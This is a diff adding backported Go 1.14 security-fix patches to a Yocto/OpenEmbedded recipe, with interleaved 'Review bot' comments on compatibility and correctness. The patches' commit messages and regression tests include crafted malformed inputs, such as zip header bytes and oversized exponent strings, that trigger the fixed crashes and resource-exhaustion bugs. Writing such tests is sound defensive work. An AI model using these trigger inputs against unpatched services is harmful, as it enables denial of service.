+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
@@ -0,0 +1,113 @@
+From c8866491ac424cdf39aedb325e6dec9e54418cfb Mon Sep 17 00:00:00 2001
+From: Robert Griesemer <gri@golang.org>
+Date: Sun, 2 May 2021 11:27:03 -0700
+Subject: [PATCH] math/big: check for excessive exponents in Rat.SetString
+
+CVE-2021-33198
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/df9ce19db6df32d94eae8760927bdfbc595433c3]
+CVE: CVE-2021-33198
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Found by OSS-Fuzz https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33284
+
+Thanks to Emmanuel Odeke for reporting this issue.
+
+Updates #45910
+Fixes #46305
+Fixes CVE-2021-33198
+
+Change-Id: I61e7b04dbd80343420b57eede439e361c0f7b79c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/316149
+Trust: Robert Griesemer <gri@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Robert Griesemer <gri@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+(cherry picked from commit 6c591f79b0b5327549bd4e94970f7a279efb4ab0)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321831
+Run-TryBot: Katie Hockman <katie@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+---
+ src/math/big/ratconv.go | 15 ++++++++-------
+ src/math/big/ratconv_test.go | 25 +++++++++++++++++++++++++
+ 2 files changed, 33 insertions(+), 7 deletions(-)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index e8cbdbe..90053a9 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -51,7 +51,8 @@ func (z *Rat) Scan(s fmt.ScanState, ch rune) error {
+ // An optional base-10 ``e'' or base-2 ``p'' (or their upper-case variants)
+ // exponent may be provided as well, except for hexadecimal floats which
+ // only accept an (optional) ``p'' exponent (because an ``e'' or ``E'' cannot
+-// be distinguished from a mantissa digit).
++// be distinguished from a mantissa digit). If the exponent's absolute value
++// is too large, the operation may fail.
+ // The entire string, not just a prefix, must be valid for success. If the
+ // operation failed, the value of z is undefined but the returned value is nil.
+ func (z *Rat) SetString(s string) (*Rat, bool) {
+@@ -174,6 +175,9 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ return nil, false
+ }
+ }
++ if n > 1e6 {
++ return nil, false // avoid excessively large exponents
++ }
+ pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ if exp5 > 0 {
+ z.a.abs = z.a.abs.mul(z.a.abs, pow5)
+@@ -186,15 +190,12 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ }
+
+ // apply exp2 contributions
++ if exp2 < -1e7 || exp2 > 1e7 {
++ return nil, false // avoid excessively large exponents
++ }
+ if exp2 > 0 {
+- if int64(uint(exp2)) != exp2 {
+- panic("exponent too large")
+- }
+ z.a.abs = z.a.abs.shl(z.a.abs, uint(exp2))
+ } else if exp2 < 0 {
+- if int64(uint(-exp2)) != -exp2 {
+- panic("exponent too large")
+- }
+ z.b.abs = z.b.abs.shl(z.b.abs, uint(-exp2))
+ }
+
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index b820df4..e55e655 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -590,3 +590,28 @@ func TestIssue31184(t *testing.T) {
+ }
+ }
+ }
++
++func TestIssue45910(t *testing.T) {
++ var x Rat
++ for _, test := range []struct {
++ input string
++ want bool
++ }{
++ {"1e-1000001", false},
++ {"1e-1000000", true},
++ {"1e+1000000", true},
++ {"1e+1000001", false},
++
++ {"0p1000000000000", true},
++ {"1p-10000001", false},
++ {"1p-10000000", true},
++ {"1p+10000000", true},
++ {"1p+10000001", false},
++ {"1.770p02041010010011001001", false}, // test case from issue
++ } {
++ _, got := x.SetString(test.input)
++ if got != test.want {
++ t.Errorf("SetString(%s) got ok = %v; want %v", test.input, got, test.want)
++ }
++ }
++}
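Review bot: The doc comment added to SetString says only that the operation "may fail" for a too-large exponent, while the code rejects `n > 1e6` on the base-10 path and `exp2` outside ±1e7, and TestIssue45910 pins exactly those boundaries. Stating them next to the checks, e.g. `// base-10 exponents beyond ±1e6 and base-2 exponents beyond ±1e7 are rejected`, would tell callers parsing untrusted numbers what is refused. It would also make clear that inputs up to those bounds are still expanded in full, so callers may want their own length limits. Most of SetString lies outside these hunks, so how `n` is derived from the parsed exponent is not visible here.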
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
new file mode 100644
index 0000000000..8fb346d622
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
@@ -0,0 +1,51 @@
+From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 9 Jun 2021 11:31:27 -0700
+Subject: [PATCH] crypto/tls: test key type when casting
+
+When casting the certificate public key in generateClientKeyExchange,
+check the type is appropriate. This prevents a panic when a server
+agrees to a RSA based key exchange, but then sends an ECDSA (or
+other) certificate.
+
+Fixes #47143
+Fixes CVE-2021-34558
+
+Thanks to Imre Rad for reporting this issue.
+
+Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-by: Katie Hockman <katiehockman@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport
+https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
+CVE: CVE-2021-34558
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/crypto/tls/key_agreement.go | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: go/src/crypto/tls/key_agreement.go
+===================================================================
+--- go.orig/src/crypto/tls/key_agreement.go
++++ go/src/crypto/tls/key_agreement.go
+@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
+ return nil, nil, err
+ }
+
+- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
++ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
++ if !ok {
++ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
++ }
++ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
+ if err != nil {
+ return nil, nil, err
+ }
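Review bot: The new `!ok` branch in rsaKeyAgreement.generateClientKeyExchange has no test in this patch; the diffstat lists only key_agreement.go. A client-handshake test matching the case in the patch description, with an RSA key exchange agreed but a non-RSA certificate presented, would guard against the unchecked assertion returning. It should assert the `tls: server certificate contains incorrect key type for selected ciphersuite` error. The function begins and ends outside the hunk, so how the caller turns this error into a TLS alert cannot be checked from here.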
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
new file mode 100644
index 0000000000..9c00d4ebb2
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
@@ -0,0 +1,101 @@
+From b7a85e0003cedb1b48a1fd3ae5b746ec6330102e Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 7 Jul 2021 16:34:34 -0700
+Subject: [PATCH] net/http/httputil: close incoming ReverseProxy request body
+
+Reading from an incoming request body after the request handler aborts
+with a panic can cause a panic, becuse http.Server does not (contrary
+to its documentation) close the request body in this case.
+
+Always close the incoming request body in ReverseProxy.ServeHTTP to
+ensure that any in-flight outgoing requests using the body do not
+read from it.
+
+Updates #46866
+Fixes CVE-2021-36221
+
+Change-Id: I310df269200ad8732c5d9f1a2b00de68725831df
+Reviewed-on: https://go-review.googlesource.com/c/go/+/333191
+Trust: Damien Neil <dneil@google.com>
+Reviewed-by: Brad Fitzpatrick <bradfitz@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/b7a85e0003cedb1b48a1fd3ae5b746ec6330102e
+CVE: CVE-2021-36221
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/net/http/httputil/reverseproxy.go | 9 +++++
+ src/net/http/httputil/reverseproxy_test.go | 39 ++++++++++++++++++++++
+ 2 files changed, 48 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 5d39955d62d15..8b63368386f43 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -235,6 +235,15 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ if req.ContentLength == 0 {
+ outreq.Body = nil // Issue 16036: nil Body for http.Transport retries
+ }
++ if outreq.Body != nil {
++ // Reading from the request body after returning from a handler is not
++ // allowed, and the RoundTrip goroutine that reads the Body can outlive
++ // this handler. This can lead to a crash if the handler panics (see
++ // Issue 46866). Although calling Close doesn't guarantee there isn't
++ // any Read in flight after the handle returns, in practice it's safe to
++ // read after closing it.
++ defer outreq.Body.Close()
++ }
+ if outreq.Header == nil {
+ outreq.Header = make(http.Header) // Issue 33142: historical behavior was to always allocate
+ }
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 1898ed8b8afde..4b6ad77a29466 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1122,6 +1122,45 @@ func TestReverseProxy_PanicBodyError(t *testing.T) {
+ rproxy.ServeHTTP(httptest.NewRecorder(), req)
+ }
+
++// Issue #46866: panic without closing incoming request body causes a panic
++func TestReverseProxy_PanicClosesIncomingBody(t *testing.T) {
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ out := "this call was relayed by the reverse proxy"
++ // Coerce a wrong content length to induce io.ErrUnexpectedEOF
++ w.Header().Set("Content-Length", fmt.Sprintf("%d", len(out)*2))
++ fmt.Fprintln(w, out)
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := NewSingleHostReverseProxy(backendURL)
++ proxyHandler.ErrorLog = log.New(io.Discard, "", 0) // quiet for tests
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++ frontendClient := frontend.Client()
++
++ var wg sync.WaitGroup
++ for i := 0; i < 2; i++ {
++ wg.Add(1)
++ go func() {
++ defer wg.Done()
++ for j := 0; j < 10; j++ {
++ const reqLen = 6 * 1024 * 1024
++ req, _ := http.NewRequest("POST", frontend.URL, &io.LimitedReader{R: neverEnding('x'), N: reqLen})
++ req.ContentLength = reqLen
++ resp, _ := frontendClient.Transport.RoundTrip(req)
++ if resp != nil {
++ io.Copy(io.Discard, resp.Body)
++ resp.Body.Close()
++ }
++ }
++ }()
++ }
++ wg.Wait()
++}
++
+ func TestSelectFlushInterval(t *testing.T) {
+ tests := []struct {
+ name string
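Review bot: The added test TestReverseProxy_PanicClosesIncomingBody uses `io.Discard` twice, in `log.New(io.Discard, "", 0)` and `io.Copy(io.Discard, resp.Body)`. That identifier exists only from Go 1.16 on, while this patch lands under go-1.14, so reverseproxy_test.go would no longer compile there. Use `ioutil.Discard` in both places, e.g. `proxyHandler.ErrorLog = log.New(ioutil.Discard, "", 0)`; the test file already uses `ioutil`, as the test in CVE-2021-33197.patch shows. The test also depends on `neverEnding`, `log`, `fmt` and `sync` being available in the 1.14 test file, which the hunk does not show and should be confirmed. The reverseproxy.go change itself, `defer outreq.Body.Close()`, uses nothing version-specific.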
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
new file mode 100644
index 0000000000..24ceabf808
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
@@ -0,0 +1,97 @@
+From 4548fcc8dfd933c237f29bba6f90040a85922564 Mon Sep 17 00:00:00 2001
+From: Michael Knyszek <mknyszek@google.com>
+Date: Thu, 2 Sep 2021 16:51:59 -0400
+Subject: [PATCH] [release-branch.go1.16] misc/wasm, cmd/link: do not let
+ command line args overwrite global data
+
+On Wasm, wasm_exec.js puts command line arguments at the beginning
+of the linear memory (following the "zero page"). Currently there
+is no limit for this, and a very long command line can overwrite
+the program's data section. Prevent this by limiting the command
+line to 4096 bytes, and in the linker ensuring the data section
+starts at a high enough address (8192).
+
+(Arguably our address assignment on Wasm is a bit confusing. This
+is the minimum fix I can come up with.)
+
+Thanks to Ben Lubar for reporting this issue.
+
+Change by Cherry Mui <cherryyz@google.com>.
+
+For #48797
+Fixes #48799
+Fixes CVE-2021-38297
+
+Change-Id: I0f50fbb2a5b6d0d047e3c134a88988d9133e4ab3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1205933
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/354591
+Trust: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+
+CVE: CVE-2021-38297
+
+Upstream-Status: Backport:
+https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564
+
+Inline of ctxt.isWAsm followin this implemetation:
+https://github.com/golang/go/blob/4548fcc8dfd933c237f29bba6f90040a85922564/src/cmd/link/internal/ld/target.go#L127
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ misc/wasm/wasm_exec.js | 7 +++++++
+ src/cmd/link/internal/ld/data.go | 11 ++++++++++-
+ 2 files changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/misc/wasm/wasm_exec.js b/misc/wasm/wasm_exec.js
+index 82041e6bb901..a0a264278b1b 100644
+--- a/misc/wasm/wasm_exec.js
++++ b/misc/wasm/wasm_exec.js
+@@ -564,6 +564,13 @@
+ offset += 8;
+ });
+
++ // The linker guarantees global data starts from at least wasmMinDataAddr.
++ // Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
++ const wasmMinDataAddr = 4096 + 4096;
++ if (offset >= wasmMinDataAddr) {
++ throw new Error("command line too long");
++ }
++
+ this._inst.exports.run(argc, argv);
+ if (this.exited) {
+ this._resolveExitPromise();
+diff --git a/src/cmd/link/internal/ld/data.go b/src/cmd/link/internal/ld/data.go
+index 52035e96301c..54a1d188cdb9 100644
+--- a/src/cmd/link/internal/ld/data.go
++++ b/src/cmd/link/internal/ld/data.go
+@@ -2330,6 +2330,11 @@ func assignAddress(ctxt *Link, sect *sym.Section, n int, s loader.Sym, va uint64
+ return sect, n, va
+ }
+
++// On Wasm, we reserve 4096 bytes for zero page, then 4096 bytes for wasm_exec.js
++// to store command line args. Data sections starts from at least address 8192.
++// Keep in sync with wasm_exec.js.
++const wasmMinDataAddr = 4096 + 4096
++
+ // address assigns virtual addresses to all segments and sections and
+ // returns all segments in file order.
+ func (ctxt *Link) address() []*sym.Segment {
+@@ -2339,10 +2344,14 @@ func (ctxt *Link) address() []*sym.Segment {
+ order = append(order, &Segtext)
+ Segtext.Rwx = 05
+ Segtext.Vaddr = va
+- for _, s := range Segtext.Sections {
++ for i, s := range Segtext.Sections {
+ va = uint64(Rnd(int64(va), int64(s.Align)))
+ s.Vaddr = va
+ va += s.Length
++
++ if ctxt.Arch.Family == sys.Wasm && i == 0 && va < wasmMinDataAddr {
++ va = wasmMinDataAddr
++ }
+ }
+
+ Segtext.Length = va - uint64(*FlagTextAddr)
+ \ No newline at end of file
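Review bot: The `Upstream-Status: Backport:` line has a trailing colon and puts the commit URL on the following line, unlike the bracketed form in CVE-2021-33198.patch, and tooling that parses the tag may not recognise it. Write `Upstream-Status: Backport [https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564]`. The patch file also ends without a newline (`\ No newline at end of file`). On the code side, the 8192-byte boundary is now defined in both wasm_exec.js and data.go, linked only by the "Keep in sync" comments. The inlined `ctxt.Arch.Family == sys.Wasm` test assumes `sys` is already imported in the 1.14 data.go, which the hunk does not show.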
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
new file mode 100644
index 0000000000..88fca9cad9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
@@ -0,0 +1,79 @@
+From 6c480017ae600b2c90a264a922e041df04dfa785 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 18 Aug 2021 11:49:29 -0700
+Subject: [PATCH] [release-branch.go1.16] archive/zip: prevent preallocation
+ check from overflowing
+
+If the indicated directory size in the archive header is so large that
+subtracting it from the archive size overflows a uint64, the check that
+the indicated number of files in the archive can be effectively
+bypassed. Prevent this from happening by checking that the indicated
+directory size is less than the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #47985
+Updates #47801
+Fixes CVE-2021-39293
+
+Change-Id: Ifade26b98a40f3b37398ca86bd5252d12394dd24
+Reviewed-on: https://go-review.googlesource.com/c/go/+/343434
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+(cherry picked from commit bacbc33439b124ffd7392c91a5f5d96eca8c0c0b)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/345409
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+Trust: Cherry Mui <cherryyz@google.com>
+
+https://github.com/golang/go/commit/6c480017ae600b2c90a264a922e041df04dfa785
+CVE: CVE-2021-39293
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/archive/zip/reader.go | 2 +-
+ src/archive/zip/reader_test.go | 18 ++++++++++++++++++
+ 2 files changed, 19 insertions(+), 1 deletion(-)
+
+diff --git a/src/archive/zip/reader.go b/src/archive/zip/reader.go
+index ddef2b7b5a517..801d1313b6c32 100644
+--- a/src/archive/zip/reader.go
++++ b/src/archive/zip/reader.go
+@@ -105,7 +105,7 @@ func (z *Reader) init(r io.ReaderAt, size int64) error {
+ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
+ // header which will be _at least_ 30 bytes we can safely preallocate
+ // if (data size / 30) >= end.directoryRecords.
+- if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++ if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
+ z.File = make([]*File, 0, end.directoryRecords)
+ }
+ z.Comment = end.comment
+diff --git a/src/archive/zip/reader_test.go b/src/archive/zip/reader_test.go
+index 471be27bb1004..99f13345d8d06 100644
+--- a/src/archive/zip/reader_test.go
++++ b/src/archive/zip/reader_test.go
+@@ -1225,3 +1225,21 @@ func TestCVE202133196(t *testing.T) {
+ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
+ }
+ }
++
++func TestCVE202139293(t *testing.T) {
++ // directory size is so large, that the check in Reader.init
++ // overflows when subtracting from the archive size, causing
++ // the pre-allocation check to be bypassed.
++ data := []byte{
++ 0x50, 0x4b, 0x06, 0x06, 0x05, 0x06, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++ 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
++ 0xff, 0x50, 0xfe, 0x00, 0xff, 0x00, 0x3a, 0x00, 0x00, 0x00, 0xff,
++ }
++ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
++ if err != ErrFormat {
++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++ }
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
new file mode 100644
index 0000000000..526796dbcb
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
@@ -0,0 +1,86 @@
+From d19c5bdb24e093a2d5097b7623284eb02726cede Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 14 Oct 2021 13:02:01 -0700
+Subject: [PATCH] [release-branch.go1.16] debug/macho: fail on invalid dynamic
+ symbol table command
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fail out when loading a file that contains a dynamic symbol table
+command that indicates a larger number of symbols than exist in the
+loaded symbol table.
+
+Thanks to Burak Çarıkçı - Yunus Yıldırım (CT-Zer0 Crypttech) for
+reporting this issue.
+
+Updates #48990
+Fixes #48991
+Fixes CVE-2021-41771
+
+Change-Id: Ic3d6e6529241afcc959544b326b21b663262bad5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/355990
+Reviewed-by: Julie Qiu <julie@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+(cherry picked from commit 61536ec03063b4951163bd09609c86d82631fa27)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/359454
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+https://github.com/golang/go/commit/d19c5bdb24e093a2d5097b7623284eb02726cede
+CVE: CVE-2021-41771
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/debug/macho/file.go | 9 +++++++++
+ src/debug/macho/file_test.go | 7 +++++++
+ .../testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 | 1 +
+ 3 files changed, 17 insertions(+)
+ create mode 100644 src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+
+diff --git a/src/debug/macho/file.go b/src/debug/macho/file.go
+index 085b0c8219bad..73cfce3c7606e 100644
+--- a/src/debug/macho/file.go
++++ b/src/debug/macho/file.go
+@@ -345,6 +345,15 @@ func NewFile(r io.ReaderAt) (*File, error) {
+ if err := binary.Read(b, bo, &hdr); err != nil {
+ return nil, err
+ }
++ if hdr.Iundefsym > uint32(len(f.Symtab.Syms)) {
++ return nil, &FormatError{offset, fmt.Sprintf(
++ "undefined symbols index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++ hdr.Iundefsym, len(f.Symtab.Syms)), nil}
++ } else if hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms)) {
++ return nil, &FormatError{offset, fmt.Sprintf(
++ "number of undefined symbols after index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++ hdr.Iundefsym+hdr.Nundefsym, len(f.Symtab.Syms)), nil}
++ }
+ dat := make([]byte, hdr.Nindirectsyms*4)
+ if _, err := r.ReadAt(dat, int64(hdr.Indirectsymoff)); err != nil {
+ return nil, err
+diff --git a/src/debug/macho/file_test.go b/src/debug/macho/file_test.go
+index 03915c86e23d9..9beeb80dd27c1 100644
+--- a/src/debug/macho/file_test.go
++++ b/src/debug/macho/file_test.go
+@@ -416,3 +416,10 @@ func TestTypeString(t *testing.T) {
+ t.Errorf("got %v, want %v", TypeExec.GoString(), "macho.Exec")
+ }
+ }
++
++func TestOpenBadDysymCmd(t *testing.T) {
++ _, err := openObscured("testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64")
++ if err == nil {
++ t.Fatal("openObscured did not fail when opening a file with an invalid dynamic symbol table command")
++ }
++}
+diff --git a/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+new file mode 100644
+index 0000000000000..8e0436639c109
+--- /dev/null
++++ b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+@@ -0,0 +1 @@
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
+\ No newline at end of file
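Review bot: The second added check in `NewFile`, `hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms))`, appears to do the addition in `uint32` (both fields are compared against a `uint32` cast), so a file declaring a very large `Nundefsym` can wrap the sum to a small value and pass the bound. Because the first branch has already established `hdr.Iundefsym <= len(f.Symtab.Syms)`, the comparison can be written without the addition: `} else if hdr.Nundefsym > uint32(len(f.Symtab.Syms))-hdr.Iundefsym {`. The added lines also dereference `f.Symtab` unconditionally; whether a dynamic symbol table command can be reached before any symbol table command has set `f.Symtab` is not visible here and should be confirmed. The body of `NewFile` continues outside the hunk.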
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
new file mode 100644
index 0000000000..9c4fee2db4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
@@ -0,0 +1,93 @@
+From 9f1860075990e7bf908ca7cc329d1d3ef91741c8 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 9 Dec 2021 06:13:31 -0500
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d0aebe3e74fe14799f97ddd3f01129697c6a290a]
+CVE: CVE-2021-44716
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Pull in security fix
+
+ a5309b3 http2: cap the size of the server's canonical header cache
+
+Updates #50058
+Fixes CVE-2021-44716
+
+Change-Id: Ifdd13f97fce168de5fb4b2e74ef2060d059800b9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370575
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+(cherry picked from commit d0aebe3e74fe14799f97ddd3f01129697c6a290a)
+---
+ src/go.mod | 2 +-
+ src/go.sum | 4 ++--
+ src/net/http/h2_bundle.go | 10 +++++++++-
+ src/vendor/modules.txt | 2 +-
+ 4 files changed, 13 insertions(+), 5 deletions(-)
+
+diff --git a/src/go.mod b/src/go.mod
+index ec6bd98..56f2fbb 100644
+--- a/src/go.mod
++++ b/src/go.mod
+@@ -4,7 +4,7 @@ go 1.14
+
+ require (
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d
+- golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++ golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf // indirect
+ golang.org/x/text v0.3.3-0.20191031172631-4b67af870c6f // indirect
+ )
+diff --git a/src/go.sum b/src/go.sum
+index 171e083..1ceba05 100644
+--- a/src/go.sum
++++ b/src/go.sum
+@@ -2,8 +2,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d h1:9FCpayM9Egr1baVnV1SX0H87m+XB0B8S0hAMi99X/3U=
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+ golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057 h1:HThQeV5c0Ab/Puir+q6mC97b7+3dfZdsLWMLoBrzo68=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca h1:UmeWAm8AwB6NA/e4FSaGlK1EKTLXKX3utx4Si+6kfPg=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+ golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+ golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
